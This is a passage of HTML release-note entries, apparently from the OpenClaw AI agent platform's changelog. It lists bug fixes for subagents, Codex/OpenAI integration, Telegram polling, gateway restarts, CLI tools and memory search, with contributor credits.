<li>Agents/subagents: preserve run-mode keep subagent registry entries past the session sweep TTL, so kept subagent runs remain visible after cleanup completes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463823834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83132" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83132/hovercard" href="https://github.com/openclaw/openclaw/issues/83132">#83132</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464018781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83168" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83168/hovercard" href="https://github.com/openclaw/openclaw/pull/83168">#83168</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>.</li>
<li>Agents/OpenAI streams: yield via <code>setTimeout(0)</code> instead of <code>setImmediate</code> between bursty Responses chunks so abort timers can fire during the yield, keeping cancel-on-timeout responsive on hot streams. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4458742937" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82462" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82462/hovercard" href="https://github.com/openclaw/openclaw/issues/82462">#82462</a>.</li>
<li>Agents/Codex: keep legacy <code>oauthRef</code>-backed OAuth profiles usable while <code>openclaw doctor --fix</code> migrates them back to inline credentials, without creating new sidecar credentials. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465275872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83312" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83312/hovercard" href="https://github.com/openclaw/openclaw/pull/83312">#83312</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents/Codex: load the selected provider owner alongside the Codex harness runtime so <code>openai-codex</code> models resolve when plugin allowlists scope runtime loading. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465725039" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83380" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83380/hovercard" href="https://github.com/openclaw/openclaw/issues/83380">#83380</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467452244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83519" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83519/hovercard" href="https://github.com/openclaw/openclaw/pull/83519">#83519</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Telegram: fail stalled isolated-ingress handlers into tombstones and abort same-lane reply work before restarting, so later same-chat updates drain after a hung turn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464995305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83272" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83272/hovercard" href="https://github.com/openclaw/openclaw/issues/83272">#83272</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467244502" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83505" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83505/hovercard" href="https://github.com/openclaw/openclaw/pull/83505">#83505</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>CLI/config: send SecretRef diagnostics to stderr so JSON command stdout remains parseable.</li>
<li>CLI/doctor: seed Control UI allowed origins when migrating legacy non-loopback gateway bind host aliases like <code>0.0.0.0</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465089879" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83286" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83286/hovercard" href="https://github.com/openclaw/openclaw/issues/83286">#83286</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>CLI/plugins: ship the bundled memory CLI as a package entry so package-installed <code>openclaw memory</code> commands register correctly.</li>
<li>CLI/update: defer doctor-time plugin package installs during package swaps and seed post-core repair from the updated install registry, preventing duplicate reinstall failures.</li>
<li>CLI/update: preserve old-parent-readable config metadata during legacy package handoffs, fall back only to official <code>@openclaw/*</code> npm plugin packages when ClawHub plugin artifacts are unavailable, and keep managed service package roots authoritative during updates.</li>
<li>Feishu: detect SecretRef top-level credentials as a configured default account instead of treating object-backed app secrets as missing.</li>
<li>Gateway/restart: keep ordinary unmanaged SIGUSR1/config restarts in-process instead of detach-spawning an orphaned child, preserving custom supervisor PID tracking while leaving update restarts on the fresh-process path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250873603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65668" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65668/hovercard" href="https://github.com/openclaw/openclaw/issues/65668">#65668</a>.</li>
<li>CLI/completion: resolve concrete PowerShell profile paths and reload commands during setup and doctor completion installation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066360712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44296/hovercard" href="https://github.com/openclaw/openclaw/issues/44296">#44296</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463206646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83059/hovercard" href="https://github.com/openclaw/openclaw/pull/83059">#83059</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yu-xin-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yu-xin-c">@yu-xin-c</a>.</li>
<li>Telegram: keep isolated long polling below the hard <code>getUpdates</code> request guard so idle bot accounts with high <code>timeoutSeconds</code> do not false-disconnect and restart-loop. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464939101" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83264/hovercard" href="https://github.com/openclaw/openclaw/issues/83264">#83264</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/riccodecarvalho/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/riccodecarvalho">@riccodecarvalho</a>.</li>
<li>Providers/Google: preserve and recover Gemini 3 tool-call thought signatures during native replay so function-calling turns no longer fail with missing <code>thought_signature</code> 400s. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336919838" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72879/hovercard" href="https://github.com/openclaw/openclaw/issues/72879">#72879</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416318334" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80358" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80358/hovercard" href="https://github.com/openclaw/openclaw/pull/80358">#80358</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abnershang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abnershang">@abnershang</a>.</li>
<li>Telegram: skip transcript-only delivery mirrors and gateway-injected rows when resolving latest assistant text, preventing retained previews from replacing final replies with stale fragments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463981517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83159" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83159/hovercard" href="https://github.com/openclaw/openclaw/issues/83159">#83159</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465564203" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83362" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83362/hovercard" href="https://github.com/openclaw/openclaw/pull/83362">#83362</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Memory/QMD: keep lexical search on raw hyphenated queries while normalizing semantic QMD sub-searches, avoiding fallback to the builtin index for dashed identifiers and dates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4435810897" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81328" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81328/hovercard" href="https://github.com/openclaw/openclaw/issues/81328">#81328</a>.</li>
<li>Memory-core: distinguish sqlite-vec load failures from missing semantic vector embeddings in degraded <code>memory index</code> warnings, so vector recall diagnostics point at unresolved dimensions instead of blaming sqlite-vec when the store is ready. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364260496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75624" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75624/hovercard" href="https://github.com/openclaw/openclaw/issues/75624">#75624</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463181130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83056/hovercard" href="https://github.com/openclaw/openclaw/pull/83056">#83056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Noah3521/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Noah3521">@Noah3521</a>.</li>
<li>Agents/subagents: preserve sandbox-peer controller ownership while routing completion announcements back to the originating run session, keeping subagent control and completion delivery scoped correctly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415216120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80201/hovercard" href="https://github.com/openclaw/openclaw/issues/80201">#80201</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415551739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80242" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80242/hovercard" href="https://github.com/openclaw/openclaw/pull/80242">#80242</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jerry-Xin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jerry-Xin">@Jerry-Xin</a>.</li>
<li>Gateway: continue restarting remaining channels when one hot-reload channel restart fails, while still reporting aggregate reload failure and rolling back plugin pre-replace stops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463173969" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83054/hovercard" href="https://github.com/openclaw/openclaw/issues/83054">#83054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Gateway/plugins: bind admin HTTP RPC dispatch to the accepting gateway instance so multi-gateway processes cannot execute plugin HTTP control-plane calls against another live gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466988696" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83486/hovercard" href="https://github.com/openclaw/openclaw/issues/83486">#83486</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466988915" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83487" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83487/hovercard" href="https://github.com/openclaw/openclaw/pull/83487">#83487</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coygeek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coygeek">@coygeek</a>.</li>
<li>Telegram: keep hot-reload restarts from marking polling accounts manually stopped and restart isolated ingress cleanly after worker shutdown, preserving Telegram replies across config reloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462834253" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83008" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83008/hovercard" href="https://github.com/openclaw/openclaw/issues/83008">#83008</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466042128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83410" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83410/hovercard" href="https://github.com/openclaw/openclaw/pull/83410">#83410</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Telegram/Ollama: pass current Telegram image attachments into native PI/Ollama vision turns so live photo prompts reach Ollama as native images. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462984078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83023" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83023/hovercard" href="https://github.com/openclaw/openclaw/issues/83023">#83023</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467422495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83516/hovercard" href="https://github.com/openclaw/openclaw/pull/83516">#83516</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Gateway/secrets: split the lightweight secrets runtime state and auth-store cache from the full secrets runtime and take a startup fast path when the gateway startup config has no SecretRef values, speeding up secrets startup while preserving cleanup and refresh semantics.</li>
<li>Codex app-server: rotate oversized native Codex threads before resume and cap dynamic tool-result text entering native Codex sessions, preventing stale oversized context from surviving OpenClaw compaction. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462638811" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82981" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82981/hovercard" href="https://github.com/openclaw/openclaw/pull/82981">#82981</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hansolo949/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hansolo949">@hansolo949</a>.</li>
<li>Gateway/restart: drain pending replies and active chat runs during restart shutdown before sockets and channels close, aborting timed-out chat runs through the normal cleanup path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292354940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69121" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69121/hovercard" href="https://github.com/openclaw/openclaw/pull/69121">#69121</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexlomt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexlomt">@alexlomt</a>.</li>
<li>Agents/Codex: use the Codex runtime context window for OpenAI-model preflight compaction and memory flush checks, so GPT-5.5 Codex sessions compact before hitting the smaller native context limit. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462658403" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82982/hovercard" href="https://github.com/openclaw/openclaw/issues/82982">#82982</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</li>
<li>QA-Lab: clean orphaned gateway temp roots when a suite parent exits and wait on gateway plus transport readiness after config restarts, reducing stale <code>qa-channel</code> noise from interrupted runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249469816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65506" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65506/hovercard" href="https://github.com/openclaw/openclaw/issues/65506">#65506</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: wake qa-bus long polls that arrive with stale future cursors after a bus restart, preserving reconnect readiness for harness clients. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268454103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67142" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67142/hovercard" href="https://github.com/openclaw/openclaw/pull/67142">#67142</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</li>
<li>QA-Lab: stage Multipass transfer scripts under OpenClaw's preferred temp root instead of raw OS temp paths, keeping the VM runner inside temp-path guardrails. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236737157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64098" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64098/hovercard" href="https://github.com/openclaw/openclaw/pull/64098">#64098</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ImLukeF/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ImLukeF">@ImLukeF</a>.</li>
<li>Agents/replies: keep surviving reply media and append a warning when other media references fail, so partial media normalization no longer drops failures silently. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jerry-Xin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jerry-Xin">@Jerry-Xin</a>.</li>
<li>Config/models: accept <code>thinkingFormat: "together"</code> in model compat config so Together routes can opt into the Together-specific thinking response shape.</li>
<li>Plugins/tokenjuice: bump the bundled tokenjuice runtime to 0.7.1, bringing Codex hook approval compatibility, pre-tool command wrapping fixes, and Rolldown/Vitest output compaction improvements into the OpenClaw plugin.</li>
<li>Agents/OpenAI: stop post-processing GPT-5 final replies with hardcoded brevity caps, preserving full channel responses instead of appending synthetic ellipses, and log when strict-agentic GPT-5 execution activates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462335362" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82910" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82910/hovercard" href="https://github.com/openclaw/openclaw/issues/82910">#82910</a>.</li>
<li>Mac app: refine the Settings General and Connection panes with cleaner status panels, card rows, and a single native titlebar sidebar toggle.</li>
<li>Agents/media: deliver failed async image, music, and video generation completions directly when requester-session completion handoff fails, so channel users see provider errors instead of silent fallback stalls.</li>
<li>Browser/CDP: keep loopback proxy bypass active across both <code>NO_PROXY</code> casings and redact home-relative Chrome MCP profile paths in attach-failure diagnostics.</li>
<li>Agents/music: steer song, jingle, beat, anthem, and instrumental requests toward <code>music_generate</code> audio creation instead of lyric-only replies, and reserve <code>lyrics</code> for exact sung words.</li>
<li>Codex app-server: record native Codex tool calls and results into trajectory artifacts so debug/trajectory exports capture the full Codex-native tool history, not just OpenClaw-bridged turns. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Codex/app-server: keep bound conversation sessions on the owning agent runtime so native Codex control and follow-up turns do not fall back to the default agent client. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462465085" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82954" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82954/hovercard" href="https://github.com/openclaw/openclaw/issues/82954">#82954</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462724002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82993" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82993/hovercard" href="https://github.com/openclaw/openclaw/pull/82993">#82993</a>)</li>
<li>CLI/infer: run gateway model probes in fresh explicit sessions so one-shot provider checks do not inherit default agent transcript state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462127302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82861" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82861/hovercard" href="https://github.com/openclaw/openclaw/pull/82861">#82861</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Providers/Together: send video-generation requests to Together's v2 video API even when shared text-model config still points at the v1 base URL. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462711627" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82992/hovercard" href="https://github.com/openclaw/openclaw/pull/82992">#82992</a>)</li>
<li>Browser CLI: preserve browser-level options on nested commands, skip option values during lazy command registration, and keep long-running wait/download/dialog hooks open for their advertised wait window.</li>
<li>CLI/sessions: accept <code>openclaw sessions list</code> as an alias for <code>openclaw sessions</code>, matching other list-style commands. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432233621" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81139/hovercard" href="https://github.com/openclaw/openclaw/issues/81139">#81139</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432597965" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81163" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81163/hovercard" href="https://github.com/openclaw/openclaw/pull/81163">#81163</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/YB0y/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/YB0y">@YB0y</a>.</li>
<li>Channels/stream previews: widen compact progress draft lines and cut prose at word boundaries while preserving command/path suffixes, with <code>streaming.progress.maxLineChars</code> for channel-specific tuning.</li>
<li>CLI/plugins: have <code>openclaw plugins doctor</code> warn when a configured runtime needs a missing owner plugin, sharing the same install mapping as <code>openclaw doctor --fix</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4435782026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81326" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81326/hovercard" href="https://github.com/openclaw/openclaw/issues/81326">#81326</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4443400168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81674" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81674/hovercard" href="https://github.com/openclaw/openclaw/pull/81674">#81674</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zavianx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zavianx">@Zavianx</a>.</li>
<li>Agents/Codex: route OpenAI runs that resolve to <code>openai-codex</code> through the Codex provider and bootstrap OpenClaw's stored OAuth profile into the Codex harness when the harness owns transport, so <code>openai/*</code> model refs no longer fail with <code>No API key found for openai-codex</code> despite an existing Codex OAuth profile. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462142665" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82864" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82864/hovercard" href="https://github.com/openclaw/openclaw/pull/82864">#82864</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ragesaq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ragesaq">@ragesaq</a>.</li>
<li>Agents/ACP: distinguish prompt-submitted and runtime-active child stalls from true interactive waits, including redacted proxy-env diagnostics for Codex ACP no-output runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069428847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44810" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44810/hovercard" href="https://github.com/openclaw/openclaw/issues/44810">#44810</a>.</li>
<li>Agents/memory: explain that memory-triggered compaction exposes only <code>read</code> and append-only <code>write</code> when configured core tools are unavailable in <code>tools.allow</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462438972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82941" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82941/hovercard" href="https://github.com/openclaw/openclaw/issues/82941">#82941</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Agents/OpenAI: preserve deterministic tool payload ordering for prompt-cache reuse across OpenAI Responses and chat completions calls. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462435142" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82940/hovercard" href="https://github.com/openclaw/openclaw/pull/82940">#82940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>ACP/Codex: honor terminal ACP turn results so failed Codex/acpx runs are not recorded as successful after only progress text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4409392717" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79522" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79522/hovercard" href="https://github.com/openclaw/openclaw/issues/79522">#79522</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dudaefj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dudaefj">@dudaefj</a>.</li>
<li>Telegram: warn when a media group drops photos that fail to download, including albums where every photo is skipped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144617570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55216/hovercard" href="https://github.com/openclaw/openclaw/issues/55216">#55216</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462674675" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82987" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82987/hovercard" href="https://github.com/openclaw/openclaw/pull/82987">#82987</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eldar702/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eldar702">@eldar702</a>.</li>
